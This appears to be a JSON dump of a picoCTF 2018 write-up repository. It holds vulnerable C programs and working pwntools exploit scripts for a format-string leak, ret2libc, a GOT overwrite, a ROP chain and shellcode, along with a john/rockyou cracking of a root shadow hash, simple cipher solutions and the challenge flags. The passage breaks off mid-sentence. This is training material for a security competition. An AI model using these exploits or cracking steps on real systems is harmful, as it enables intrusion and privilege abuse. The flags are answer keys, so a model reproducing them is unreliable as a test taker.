    "content": "# echooo \nPoints: 300\n\n## Category\nBinary Exploitation\n\n## Question\n>This program prints any input you give it. Can you [leak](files/echo) the flag? Connect with `nc 2018shell1.picoctf.com 46960`. [Source](files/echo.c). \n\n### Hint\n>If only the program used puts...\n\n## Solution\nA simple format string exploit.\n\nLooking at the source code, we see that the flag is stored in the stack. All we have to do is to leak values from the stack to get the flag.\n\nDoing some testing locally, we see that the flag starts at _%29$x_. This format simply takes the 29th argument and print it out as hex.\n\nSince the buffer only accepts 64 bytes, we have to stagger the inputs.\n\n```\n$ python solve.py \n[+] Opening connection to 2018shell1.picoctf.com on port 46960: Done\nTime to learn about Format Strings!\nWe will evaluate any format string you give us with printf().\nSee if you can get the flag!\n> %27$x %28$x %29$x %30$x %31$x %32$x %33$x %34$x %35$x %36$x\n[*] Flag Part 1: 6f636970 7b465443 6d526f66 735f7434 6e695274 615f7347 445f6552 65476e61 73753072 6237615f\n> %37$x %38$x %39$x %40$x %41$x\n[*] Flag Part 2: 32613463 a7d64 80487ab 1 ffe42d84\n[+] Flag: picoCTF{foRm4t_stRinGs_aRe_DanGer0us_a7bc4a2d}\n[*] Closed connection to 2018shell1.picoctf.com port 46960\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{foRm4t_stRinGs_aRe_DanGer0us_a7bc4a2d}`\n"
  },
  {
    "path": "Binary Exploitation/echooo/files/echo.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n\n  char buf[64];\n  char flag[64];\n  char *flag_ptr = flag;\n  \n  // Set the gid to the effective gid\n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n\n  memset(buf, 0, sizeof(flag));\n  memset(buf, 0, sizeof(buf));\n\n  puts(\"Time to learn about Format Strings!\");\n  puts(\"We will evaluate any format string you give us with printf().\");\n  puts(\"See if you can get the flag!\");\n  \n  FILE *file = fopen(\"flag.txt\", \"r\");\n  if (file == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n  \n  fgets(flag, sizeof(flag), file);\n  \n  while(1) {\n    printf(\"> \");\n    fgets(buf, sizeof(buf), stdin);\n    printf(buf);\n  }  \n  return 0;\n}\n"
  },
  {
    "path": "Binary Exploitation/echooo/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\nimport re\n\nencFlag = ''\ns = remote('2018shell1.picoctf.com', 46960)\nstage1 = ' '.join(['%{}$x'.format(i) for i in range(27, 37)])\nprint s.recvuntil('>'), stage1\ns.sendline(stage1)\nflag1 = s.recvuntil('\\n').strip()\nlog.info('Flag Part 1: {}'.format(flag1))\n\nstage2 = ' '.join(['%{}$x'.format(i) for i in range(37, 42)])\nprint '>', stage2\ns.sendline(stage2)\nflag2 = s.recvuntil('\\n').replace('>', '').strip()\nlog.info('Flag Part 2: {}'.format(flag2))\n\nencFlag = flag1 + ' ' + flag2\n\nflag = ''\nfor i in encFlag.split(' '):\n\tflag += p32(int(i, 16))\n\nlog.success('Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0])\n"
  },
  {
    "path": "Binary Exploitation/got-2-learn-libc/README.md",
    "content": "# got-2-learn-libc\nPoints: 250\n\n## Category\nBinary Exploitation\n\n## Question\n>This program gives you the address of some system calls. Can you get a shell? You can find the [program](files/vuln) in /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33 on the shell server. [Source](files/vuln.c). \n\n### Hint\n>try returning to systems calls to leak information\n>\n>don't forget you can always return back to main().\n\n## Solution\nWorking solution [solve.py](solution/solve.py)\n\nThanks to [@LFlare](https://github.com/LFlare) for making the code compatible with ASLR\n\n### Flag\n`picoCTF{syc4al1s_4rE_uS3fUl_6319ec91}`\n"
  },
  {
    "path": "Binary Exploitation/got-2-learn-libc/files/vuln.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\n#define BUFSIZE 148\n#define FLAGSIZE 128\n\nchar useful_string[16] = \"/bin/sh\"; /* Maybe this can be used to spawn a shell? */\n\n\nvoid vuln(){\n  char buf[BUFSIZE];\n  puts(\"Enter a string:\");\n  gets(buf);\n  puts(buf);\n  puts(\"Thanks! Exiting now...\");\n}\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n  \n  // Set the gid to the effective gid\n  // this prevents /bin/sh from dropping the privileges\n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n\n\n  puts(\"Here are some useful addresses:\\n\");\n\n  printf(\"puts: %p\\n\", puts);\n  printf(\"fflush %p\\n\", fflush);\n  printf(\"read: %p\\n\", read);\n  printf(\"write: %p\\n\", write);\n  printf(\"useful_string: %p\\n\", useful_string);\n\n  printf(\"\\n\");\n  \n  vuln();\n\n  \n  return 0;\n}\n"
  },
  {
    "path": "Binary Exploitation/got-2-learn-libc/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\nimport os.path\n\nUSER = 'Platy' # Change username accordingly.\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\n\nif not os.path.isfile('./libc.so.6'):\n\ts.get('/lib32/libc.so.6')\n\n# Set contexts\ncontext(arch='i386', os='linux')\n\n# Load libraries\nlibc = ELF(\"./libc.so.6\")\n\nlibc_read_addr = libc.symbols['read']\nlibc_system_addr = libc.symbols['system']\nlibc_exit_addr = libc.symbols['exit']\n\npy = s.run(\"cd /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33; ./vuln\")\npy.recvuntil('\\n\\n')\n\npy.recvuntil(': ')\nputs_addr = int(py.readline(), 16)\n\npy.readuntil(' ')\nfflush_addr = int(py.readline(), 16)\n\npy.readuntil(': ')\nread_addr = int(py.readline(), 16)\n\npy.readuntil(': ')\nwrite_addr = int(py.readline(), 16)\n\npy.readuntil(': ')\nbinsh_addr = int(py.readline(), 16)\nlog.info(\"/bin/sh: {}\".format(hex(binsh_addr))) \n\n# Calculate offset\nlibc_offset = read_addr - libc_read_addr\n\n# Calculate libc offsets\nsystem_addr = libc_system_addr + libc_offset\nlog.info(\"SYSTEM: {}\".format(hex(system_addr))) \nexit_addr = libc_exit_addr + libc_offset\nlog.info(\"EXIT: {}\".format(hex(exit_addr)))\n\n# Build payload\npadding = \"A\" * 160\nexploit = padding + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)\n\npy.sendline(exploit)\npy.sendline('echo; cat flag.txt; echo')\npy.interactive()\n\n# Close process\npy.close()\n"
  },
  {
    "path": "Binary Exploitation/got-shell?/README.md",
    "content": "# got-shell?\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you authenticate to this [service](files/auth) and get the flag? Connect to it with `nc 2018shell1.picoctf.com 54664`. [Source](files/auth.c)\n\n### Hint\n>Ever heard of the Global Offset Table?\n\n## Solution\nOverwrite the Global Offset Table to the address of the win function.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{m4sT3r_0f_tH3_g0t_t4b1e_150b198c}`\n"
  },
  {
    "path": "Binary Exploitation/got-shell?/files/auth.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n#include <sys/types.h>\n\nvoid win() {\n  system(\"/bin/sh\");\n}\n\nint main(int argc, char **argv) {\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n\n  char buf[256];\n  \n  unsigned int address;\n  unsigned int value;\n\n  puts(\"I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?\");\n\n  scanf(\"%x\", &address);\n\n  sprintf(buf, \"Okay, now what value would you like to write to 0x%x\", address);\n  puts(buf);\n  \n  scanf(\"%x\", &value);\n\n  sprintf(buf, \"Okay, writing 0x%x to 0x%x\", value, address);\n  puts(buf);\n\n  *(unsigned int *)address = value;\n\n  puts(\"Okay, exiting now...\\n\");\n  exit(1);\n  \n}\n"
  },
  {
    "path": "Binary Exploitation/got-shell?/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\nfrom time import sleep\n\nauth = ELF('./auth')\ngot = str(hex(auth.got['exit']))\nwin_func = str(hex(auth.symbols['win']))\n\nlog.info('Global Offset: {}'.format(got))\nlog.info('Win Function: {}'.format(win_func))\n\ns = remote('2018shell1.picoctf.com', 54664)\nprint s.recv()\nprint got\ns.sendline(got)\nsleep(1)\nprint s.recv()\n\ns.sendline(win_func)\ns.sendline('cat flag.txt')\ns.interactive()\ns.close()\n"
  },
  {
    "path": "Binary Exploitation/gps/README.md",
    "content": "# gps\nPoints: 550\n\n## Category\nBinary Exploitation\n\n## Question\n>You got really lost in the wilderness, with nothing but your trusty [gps](files/gps). Can you find your way back to a shell and get the flag? Connect with `nc 2018shell1.picoctf.com 21755`. ([Source](files/gps.c)). \n\n### Hint\n>Can you make your shellcode randomization-resistant?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Binary Exploitation/gps/files/gps.c",
    "content": "#include <stdint.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <unistd.h>\n\n#define GPS_ACCURACY 1337\n\ntypedef void (fn_t)(void);\n\nvoid initialize() {\n    printf(\"GPS Initializing\");\n    for (int i = 0; i < 10; ++i) {\n        usleep(300000);\n        printf(\".\");\n    }\n    printf(\"Done\\n\");\n}\n\nvoid acquire_satellites() {\n    printf(\"Acquiring satellites.\");\n    for (int i = 0; i < 3; ++i) {\n        printf(\"Satellite %d\", i);\n        for (int j = 0; j < rand() % 10; ++j) {\n            usleep(133700);\n            printf(\".\");\n        }\n        if (i != 3) {\n            printf(\"Done\\n\");\n        } else {\n            printf(\"Weak signal.\\n\");\n        }\n    }\n\n    printf(\"\\nGPS Initialized.\\n\");\n    printf(\"Warning: Weak signal causing low measurement accuracy\\n\\n\");\n}\n\nvoid *query_position() {\n  char stk;\n  int offset = rand() % GPS_ACCURACY - (GPS_ACCURACY / 2);\n  void *ret = &stk + offset;\n  return ret;\n}\n\n\nint main() {\n    setbuf(stdout, NULL);\n\n    char buffer[0x1000];\n    srand((unsigned) (uintptr_t) buffer);\n\n    initialize();\n    acquire_satellites();\n\n    printf(\"We need to access flag.txt.\\nCurrent position: %p\\n\", query_position());\n\n    printf(\"What's your plan?\\n> \");\n    fgets(buffer, sizeof(buffer), stdin);\n\n    fn_t *location;\n\n    printf(\"Where do we start?\\n> \");\n    scanf(\"%p\", (void**) &location);\n\n    location();\n    return 0;\n}\n"
  },
  {
    "path": "Binary Exploitation/leak-me/README.md",
    "content": "# leak-me\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you authenticate to this [service](files/auth) and get the flag? Connect with `nc 2018shell1.picoctf.com 31045`. [Source](files/auth.c). \n\n### Hint\n>Are all the system calls being used safely?\n>\n>Some people can have reallllllly long names you know..\n\n## Solution\nBy spamming the service with multiple characters, the password from _password.txt_ gets leaked.\n\n```\n$ python -c \"print 'A' * 300\" | nc 2018shell1.picoctf.com 31045\nWhat is your name?\nHello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,a_reAllY_s3cuRe_p4s$word_d98e8d\n\nIncorrect Password!\n```\n\nNow we can enter in a name and the password obtained.\n\n```\n$ nc 2018shell1.picoctf.com 31045\nWhat is your name?\nPlaty\nHello Platy,\nPlease Enter the Password.\na_reAllY_s3cuRe_p4s$word_d98e8d\npicoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_d1667872}\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_d1667872}`\n"
  },
  {
    "path": "Binary Exploitation/leak-me/files/auth.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\nint flag() {\n  char flag[48];\n  FILE *file;\n  file = fopen(\"flag.txt\", \"r\");\n  if (file == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  fgets(flag, sizeof(flag), file);\n  printf(\"%s\", flag);\n  return 0;\n}\n\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n  \n  // Set the gid to the effective gid\n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n  \n  // real pw: \n  FILE *file;\n  char password[64];\n  char name[256];\n  char password_input[64];\n  \n  memset(password, 0, sizeof(password));\n  memset(name, 0, sizeof(name));\n  memset(password_input, 0, sizeof(password_input));\n  \n  printf(\"What is your name?\\n\");\n  \n  fgets(name, sizeof(name), stdin);\n  char *end = strchr(name, '\\n');\n  if (end != NULL) {\n    *end = '\\x00';\n  }\n\n  strcat(name, \",\\nPlease Enter the Password.\");\n\n  file = fopen(\"password.txt\", \"r\");\n  if (file == NULL) {\n    printf(\"Password File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  fgets(password, sizeof(password), file);\n\n  printf(\"Hello \");\n  puts(name);\n\n  fgets(password_input, sizeof(password_input), stdin);\n  password_input[sizeof(password_input)] = '\\x00';\n  \n  if (!strcmp(password_input, password)) {\n    flag();\n  }\n  else {\n    printf(\"Incorrect Password!\\n\");\n  }\n  return 0;\n}\n"
  },
  {
    "path": "Binary Exploitation/leak-me/solution/solve.py",
    "content": "from pwn import *\nimport re\nimport time\n\ns = remote('2018shell1.picoctf.com', 31045)\nprint s.recv()\ns.sendline('A' * 500)\n\ntime.sleep(0.5)\n\npwd = s.recv()\nprint pwd\npwd = re.findall(r'A+,(.+)', pwd)[0].strip()\ns.close()\n\ns = remote('2018shell1.picoctf.com', 31045)\nprint s.recv()\ns.sendline('Platy')\nprint s.recv()\ns.sendline(pwd)\ntime.sleep(0.5)\nprint s.recv()\n\ns.close()\n"
  },
  {
    "path": "Binary Exploitation/rop chain/README.md",
    "content": "# rop chain\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you exploit the following [program](files/rop) and get the flag? You can findi the program in /problems/rop-chain_0_6cdbecac1c3aa2316425c7d44e6ddf9d on the shell server? [Source](files/rop.c). \n\n### Hint\n>Try and call the functions in the correct order!\n>\n>Remember, you can always call main() again!\n\n## Solution\nFirst we analyse the steps required to get the flag. It looks like we have to go to the _flag_ function to get the flag. But a few criterias must be met first. _win1_, _win2_ and _arg_check2_ must be set to the correct values to print the flag. There is _win_function1_ and _win_function2_ which will allow us to set these values.\n\nAt the vuln function, it calls gets, which is known for it's issues with buffer overflow exploits. We use the De Brujin sequence and calculate the offset needed. In this case, it's 28 characters.\n\nNow, we get the addresses of both win functions and the flag function.\n\n```asm\n[0x080484d0]> s @ sym.win_function1\n0x80485cb\n[0x080484d0]> s @ sym.win_function2\n0x80485d8\n[0x080484d0]> s @ sym.flag\n0x804862b\n```\n\nSince _win_function2_ and _flag_ functions both required arguments, we need a ROP gadget that pops and returns. Popping allows us to insert our own arguments inside. Then the addresses of the next function can be written, so when the program runs return, it jumps to our desired function.\n\nTo get such a gadget, we can use radare2.\n\n```asm\n[0x080484d0]> /R pop; ret;\n...\n...\n0x08048804               c408  les ecx, [eax]\n0x08048806                 5b  pop ebx\n0x08048807                 c3  ret\n```\n\nWe can select _0x08048806_ as our address. 
It does not matter which register the value from the stack is popped to.\n\nNow we just chain the address and get the flag.\n`exploit = padding + win1_addr + win2_addr + pop_ret_gadget + arg_check1 + flag_addr + pop_ret_gadget + arg_check2`\n\nWorking solution [solve.py](solution/solve.py)\n\nRecommended reads: http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html#fn-7\n\n### Flag\n`picoCTF{rOp_aInT_5o_h4Rd_R1gHt_536d67d1}`\n"
  },
  {
    "path": "Binary Exploitation/rop chain/files/exp",
    "content": "AAAAAAAAAAAAAAAAAAAAAAAAAAAA˅\u0004\b؅\u0004\b\u0006\u0004\b+\u0004\b\u0006\u0004\b\n"
  },
  {
    "path": "Binary Exploitation/rop chain/files/flag.txt",
    "content": "DID IT!\n"
  },
  {
    "path": "Binary Exploitation/rop chain/files/rop.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <stdbool.h>\n\n#define BUFSIZE 16\n\nbool win1 = false;\nbool win2 = false;\n\n\nvoid win_function1() {\n  win1 = true;\n}\n\nvoid win_function2(unsigned int arg_check1) {\n  if (win1 && arg_check1 == 0xBAAAAAAD) {\n    win2 = true;\n  }\n  else if (win1) {\n    printf(\"Wrong Argument. Try Again.\\n\");\n  }\n  else {\n    printf(\"Nope. Try a little bit harder.\\n\");\n  }\n}\n\nvoid flag(unsigned int arg_check2) {\n  char flag[48];\n  FILE *file;\n  file = fopen(\"flag.txt\", \"r\");\n  if (file == NULL) {\n    printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n    exit(0);\n  }\n\n  fgets(flag, sizeof(flag), file);\n  \n  if (win1 && win2 && arg_check2 == 0xDEADBAAD) {\n    printf(\"%s\", flag);\n    return;\n  }\n  else if (win1 && win2) {\n    printf(\"Incorrect Argument. Remember, you can call other functions in between each win function!\\n\");\n  }\n  else if (win1 || win2) {\n    printf(\"Nice Try! You're Getting There!\\n\");\n  }\n  else {\n    printf(\"You won't get the flag that easy..\\n\");\n  }\n}\n\nvoid vuln() {\n  char buf[16];\n  printf(\"Enter your input> \");\n  return gets(buf);\n}\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n  \n  // Set the gid to the effective gid\n  // this prevents /bin/sh from dropping the privileges\n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n  vuln();\n}\n"
  },
  {
    "path": "Binary Exploitation/rop chain/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\npadding = 'A' * 28\n\nwin1_addr = p32(0x80485cb)\nwin2_addr = p32(0x80485d8)\nflag_addr = p32(0x804862b)\n\npop_ret_gadget = p32(0x08048806)\n\narg_check1 = p32(0xBAAAAAAD)\narg_check2 = p32(0xDEADBAAD)\n\nexploit = padding + win1_addr + win2_addr + pop_ret_gadget + arg_check1 + flag_addr + pop_ret_gadget + arg_check2\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\npy = s.run('cd /problems/rop-chain_0_6cdbecac1c3aa2316425c7d44e6ddf9d; ./rop')\nprint py.recv()\npy.sendline(exploit)\nprint py.recv()\n"
  },
  {
    "path": "Binary Exploitation/shellcode/README.md",
    "content": "# shellcode\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>This [program](files/vuln) executes any input you give it. Can you get a shell? You can find the program in /problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed on the shell server. [Source](files/vuln.c). \n\n### Hint\n>Maybe try writing some shellcode?\n>\n>You also might be able to find some good shellcode online.\n\n## Solution\nRun [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{shellc0de_w00h00_9ee0edd0}`\n"
  },
  {
    "path": "Binary Exploitation/shellcode/files/exploit",
    "content": "1Ph//shh/bin°\u000b̀1@̀,\n"
  },
  {
    "path": "Binary Exploitation/shellcode/files/vuln.c",
    "content": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sys/types.h>\n\n#define BUFSIZE 148\n#define FLAGSIZE 128\n\nvoid vuln(char *buf){\n  gets(buf);\n  puts(buf);\n}\n\nint main(int argc, char **argv){\n\n  setvbuf(stdout, NULL, _IONBF, 0);\n  \n  // Set the gid to the effective gid\n  // this prevents /bin/sh from dropping the privileges\n  gid_t gid = getegid();\n  setresgid(gid, gid, gid);\n\n  char buf[BUFSIZE];\n\n  puts(\"Enter a string!\");\n  vuln(buf);\n\n  puts(\"Thanks! Executing now...\");\n  \n  ((void (*)())buf)();\n     \n  return 0;\n}\n"
  },
  {
    "path": "Binary Exploitation/shellcode/solution/solve.py",
    "content": "#!/usr/bin/python\n\nfrom pwn import *\n\nPADDING = 164\n\npayload = asm(shellcraft.sh())\nnopsled = '\\x90' * (PADDING - len(payload))\nstackAddr = p32(0xffffd22c)\n\nexploit = nopsled + payload + stackAddr\n\ns = ssh(host='2018shell1.picoctf.com', user='Platy')\n\npy = s.run('cd /problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed; ./vuln')\nprint py.recv()\npy.sendline(exploit)\npy.sendline('cat flag.txt')\npy.interactive()\ns.close()\n"
  },
  {
    "path": "Cryptography/Crypto Warmup 1/README.md",
    "content": "# Crypto Warmup 1\nPoints: 75\n\n## Category\nCryptography\n\n## Question\n>Crpyto can often be done by hand, here's a message you got from a friend, `llkjmlmpadkkc` with the key of `thisisalilkey`. Can you use this [table](files/table.txt) to solve it?. \n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{HELLO}' as the flag.\n>\n>Please use all caps for the message.\n\n## Solution\nThis uses a Vigenère Cipher. Online tool: https://planetcalc.com/2468/\n\n1. Set Transformation to _Decrypt_\n2. Set Key to _thisisalilkey_\n3. Set Text to _llkjmlmpadkkc_\n4. Click _CALCULATE_\n\nTransformed text is _secretmessage_\n\n### Flag\n`picoCTF{SECRETMESSAGE}`\n"
  },
  {
    "path": "Cryptography/Crypto Warmup 1/files/table.txt",
    "content": "    A B C D E F G H I J K L M N O P Q R S T U V W X Y Z \n   +----------------------------------------------------\nA | A B C D E F G H I J K L M N O P Q R S T U V W X Y Z\nB | B C D E F G H I J K L M N O P Q R S T U V W X Y Z A\nC | C D E F G H I J K L M N O P Q R S T U V W X Y Z A B\nD | D E F G H I J K L M N O P Q R S T U V W X Y Z A B C\nE | E F G H I J K L M N O P Q R S T U V W X Y Z A B C D\nF | F G H I J K L M N O P Q R S T U V W X Y Z A B C D E\nG | G H I J K L M N O P Q R S T U V W X Y Z A B C D E F\nH | H I J K L M N O P Q R S T U V W X Y Z A B C D E F G\nI | I J K L M N O P Q R S T U V W X Y Z A B C D E F G H\nJ | J K L M N O P Q R S T U V W X Y Z A B C D E F G H I\nK | K L M N O P Q R S T U V W X Y Z A B C D E F G H I J\nL | L M N O P Q R S T U V W X Y Z A B C D E F G H I J K\nM | M N O P Q R S T U V W X Y Z A B C D E F G H I J K L\nN | N O P Q R S T U V W X Y Z A B C D E F G H I J K L M\nO | O P Q R S T U V W X Y Z A B C D E F G H I J K L M N\nP | P Q R S T U V W X Y Z A B C D E F G H I J K L M N O\nQ | Q R S T U V W X Y Z A B C D E F G H I J K L M N O P\nR | R S T U V W X Y Z A B C D E F G H I J K L M N O P Q\nS | S T U V W X Y Z A B C D E F G H I J K L M N O P Q R\nT | T U V W X Y Z A B C D E F G H I J K L M N O P Q R S\nU | U V W X Y Z A B C D E F G H I J K L M N O P Q R S T\nV | V W X Y Z A B C D E F G H I J K L M N O P Q R S T U\nW | W X Y Z A B C D E F G H I J K L M N O P Q R S T U V\nX | X Y Z A B C D E F G H I J K L M N O P Q R S T U V W\nY | Y Z A B C D E F G H I J K L M N O P Q R S T U V W X\nZ | Z A B C D E F G H I J K L M N O P Q R S T U V W X Y\n\n"
  },
  {
    "path": "Cryptography/Crypto Warmup 2/README.md",
    "content": "# Crypto Warmup 2\nPoints: 75\n\n## Category\nCryptography\n\n## Question\n>Cryptography doesn't have to be complicated, have you ever heard of something called rot13? `cvpbPGS{guvf_vf_pelcgb!}`\n\n### Hint\n>This can be solved online if you don't want to do it by hand!\n\n## Solution\nThis uses a ROT13 Cipher. Online tool: https://www.rot13.com/\n\nSet input to _cvpbPGS{guvf_vf_pelcgb!}_\n\nOutput will be _picoCTF{this_is_crypto!}_ \n\n### Flag\n`picoCTF{this_is_crypto!}`\n"
  },
  {
    "path": "Cryptography/HEEEEEEERE'S Johnny!/README.md",
    "content": "# HEEEEEEERE'S Johnny!\nPoints: 100\n\n## Category\nCryptography\n\n## Question\n>Okay, so we found some important looking files on a linux computer. Maybe they can be used to get a password to the process. Connect with `nc 2018shell1.picoctf.com 5221`. Files can be found here: [passwd](files/passwd) [shadow](files/shadow). \n\n### Hint\n>If at first you don't succeed, try, try again. And again. And again.\n>\n>If you're not careful these kind of problems can really \"rockyou\".\n\n## Solution\nDo `john --wordlist=rockyou.txt shadow`\n\nThe file _rockyou.txt_ can be found from _/usr/share/wordlists/rockyou.txt.gz_.\n\nExtract the file by doing `gzip -d rockyou.txt.gz`\n\nConnect to service and enter in credentials to get the flag.\n\n```\n$ nc 2018shell1.picoctf.com 5221\nUsername: root\nPassword: thematrix\npicoCTF{J0hn_1$_R1pp3d_289677b5}\n```\n\n### Flag\n`picoCTF{J0hn_1$_R1pp3d_289677b5}`\n"
  },
  {
    "path": "Cryptography/HEEEEEEERE'S Johnny!/files/passwd",
    "content": "root:x:0:0:root:/root:/bin/bash"
  },
  {
    "path": "Cryptography/HEEEEEEERE'S Johnny!/files/shadow",
    "content": "root:$6$LcvKHioa$67O1HA8Ti.KHeNbD4rE79ZMl1RbiCw4V7eM.r6AURp2wGnapUpXC.VdVB4WGoS2J5eVKP/1MFeMmXIdveJeOS0:17695:0:99999:7:::\n"
  },
  {
    "path": "Cryptography/James Brahm Returns/README.md",
    "content": "# James Brahm Returns\nPoints: 700\n\n## Category\nCryptography\n\n## Question\n>Dr. Xernon has finally approved an update to James Brahm's spy terminal. (Someone finally told them that ECB isn't secure.) Fortunately, CBC mode is safe! Right? Connect with `nc 2018shell1.picoctf.com 15608`. [Source](files/source.py). \n\n### Hint\n>What killed SSL3?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Cryptography/James Brahm Returns/files/source.py",
    "content": "#!/usr/bin/python2 -u\nfrom Crypto.Cipher import AES\nimport reuse\nimport random\nfrom string import digits\nimport hashlib\n\nagent_code = \"\"\"flag\"\"\"\nkey = \"\"\"key\"\"\"\n\n\ndef pad(message):\n    if len(message) % 16 == 0:\n        message = message + chr(16)*16\n    elif len(message) % 16 != 0:\n        message = message + chr(16 - len(message)%16)*(16 - len(message)%16)\n    return message\n\ndef encrypt(key, plain, IV):\n    cipher = AES.new( key.decode('hex'), AES.MODE_CBC, IV.decode('hex') )\n    return IV + cipher.encrypt(plain).encode('hex')\n\ndef decrypt(key, ciphertext, iv):\n    cipher = AES.new(key.decode('hex'), AES.MODE_CBC, iv.decode('hex'))\n    return cipher.decrypt(ciphertext.decode('hex')).encode('hex')\n\ndef verify_mac(message):\n    h = hashlib.sha1()    \n    mac = message[-40:].decode('hex')\n    message = message[:-40].decode('hex')\n    h.update(message)\n    if h.digest() == mac:\n        return True\n    return False\n    \ndef check_padding(message):\n    check_char = ord(message[-2:].decode('hex'))\n    if (check_char < 17) and (check_char > 0): #bud\n        return message[:-check_char*2]\n    else:\n        return False\n\nwelcome = \"Welcome, Agent 006!\"\nprint welcome\noptions = \"\"\"Select an option:\nEncrypt message (E)\nSend & verify (S)\n\"\"\"\nwhile True:\n    encrypt_or_send = raw_input(options)\n    if \"e\" in encrypt_or_send.lower():\n        \n        sitrep = raw_input(\"Please enter your situation report: \")\n        message = \"\"\"Agent,\nGreetings. My situation report is as follows:\n{0}\nMy agent identifying code is: {1}.\nDown with the Soviets,\n006\n\"\"\".format( sitrep, agent_code )\n        PS = raw_input(\"Anything else? 
\")\n        h = hashlib.sha1()\n        message = message+PS\n        h.update(message)\n        message = pad(message+ h.digest())\n\n        IV = ''.join(random.choice(digits + 'abcdef') for _ in range(32))\n        print \"encrypted: {}\".format(encrypt(key, message, IV ))\n    elif \"s\" in encrypt_or_send.lower():\n        sitrep = raw_input(\"Please input the encrypted message: \")\n        iv = sitrep[:32]\n        c = sitrep[32:]\n        if reuse.check(iv):\n            message = decrypt(key, c, iv)\n            message = check_padding(message)\n            if message:\n                if verify_mac(message):\n                    print(\"Successful decryption.\")\n                else:\n                    print(\"Ooops! Did not decrypt successfully. Please send again.\")\n            else:\n                print(\"Ooops! Did not decrypt successfully. Please send again.\")\n        else:\n            print(\"Cannot reuse IVs!\")\n            \n    \n    \n\n"
  },
  {
    "path": "Cryptography/Magic Padding Oracle/README.md",
    "content": "# Magic Padding Oracle\nPoints: 450\n\n## Category\nCryptography\n\n## Question\n>Can you help us retreive the flag from this crypto service? Connect with `nc 2018shell1.picoctf.com 27533`. We were able to recover some [Source](files/pkcs7.py) Code.  \n\n### Hint\n>Paddding Oracle [Attack](https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth)\n\n## Solution\nWe have to submit the encrypted JSON string with the `\"is_admin\"` property set to a string called `\"true\"` and the `\"expires\"` property changed to a date later than the date the string was submitted. Also take note that the date string has to adhere to the following format: `%Y-%m-%d`. The `\"username\"` property has to be present but can be of any value.\n\nThis JSON string: `{\"username\": \"cafebabe!\",\"is_admin\": \"true\",\"expires\": \"2020-1-1\"}` was accepted.\nThe encrypted JSON string is: 